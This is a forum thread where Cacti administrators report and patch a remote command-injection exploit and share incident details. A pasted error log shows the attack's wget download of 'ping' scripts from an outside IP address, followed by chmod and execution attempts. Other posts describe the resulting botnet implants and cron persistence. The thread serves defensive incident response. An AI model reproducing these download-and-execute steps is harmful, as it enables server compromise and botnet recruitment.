[Cacti <= 0.8.6i] Remote Injection Exploit

[rony]

Patches for this issue are now available for the following versions:

0.8.6i
0.8.6h

[Makenshi]

My site just got hit. It looked like a brute force attack rather than using the link from the "Sites that use Cacti" page. I shall post the web server logs shortly. Luckily I caught it before any damage was done; however I shall be reimaging the server tomorrow.

[Makenshi]

Please see the log excerpt attached.

[rony]

That's not the standard exploit.

Um... I will decode later to see what they where attempting to do. Thanks for the log.

[BigWillyStyle42]

I think it's the same vulnerability, slightly different code but they're still injecting a command into the SQL database.

The command calls wget to get a ping script which it then calls and wget's some other things. A similar command was used on my machine, except they downloaded two images which were tar balls containing scripts and an httpd that connected my machine to an underworld botnet...

[Makenshi]

These are a couple of files I managed to retrieve in /etc/cron.d/, the exploit managed to start sshd running on [::]:80 and [::]:443.

[Ning]

I've seen the same, but from a other ip.
If I try to convert it - it turns out to something like this.
and the ping file it got from 143.225.151.190

At this moment I'm very glad for SELinux

[rony]

Interesting...

Glad I have a local firewall configured..

[TheWitness]

Nasty, yet elegant exploit. It's rather scary.

TheWitness

[dvl]

PLEASE! Someone post this to the announce mailing list. It needs wider attention.

I've just submitted a patch for the FreeBSD port.

[TheWitness]

Done. Also, if you applied the patch and it broke your timespan selector. So long as you are not running the Timeshifter from Gandolf, you can apply the following file directly. I will correct the issue.

TheWitness

[dvl]

See http://secunia.com/advisories/23528/

[lozzd]

I had the same as Ning.

However, I have the following in my error log:

Code: Select all

--05:54:11--  http://143.225.151.190/libsh/ping.txt
           => `ping.txt'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 345 [text/plain]
ping.txt: Permission denied

Cannot write to `ping.txt' (Permission denied).
mv: cannot stat `ping.txt': No such file or directory
Can't open perl script "temp2006": No such file or directory
--05:54:11--  http://143.225.151.190/libsh/ping
           => `ping'
Connecting to 143.225.151.190:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 15,808 [text/plain]
ping: Permission denied

Cannot write to `ping' (Permission denied).
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory
sh: curl: command not found
chmod: cannot access `ping': No such file or directory
sh: ./ping: No such file or directory

Do you think that means nothing was affected? I can't see any evidence of it anyway. I've applied the fix now.. There should really be a way to tell everyone about that! Had I not have been checking through my error logs I wouldn't have known. [/code]

[dvl]

lozzd: I suspect you're fine.

Compare your results with mine: http://www.freebsddiary.org/cacti-exploit.php

[lozzd]

Great, thanks dvl.
I guess it must have failed as I saw nothing at all unusual in my graphs.. I just happened to be nosying through my error logs and found it. I'm quite impressed really that my apache seems to be so locked down; I thought I'd done a poor attempt at securing it, but I'd obviously done something right as everything was blocked!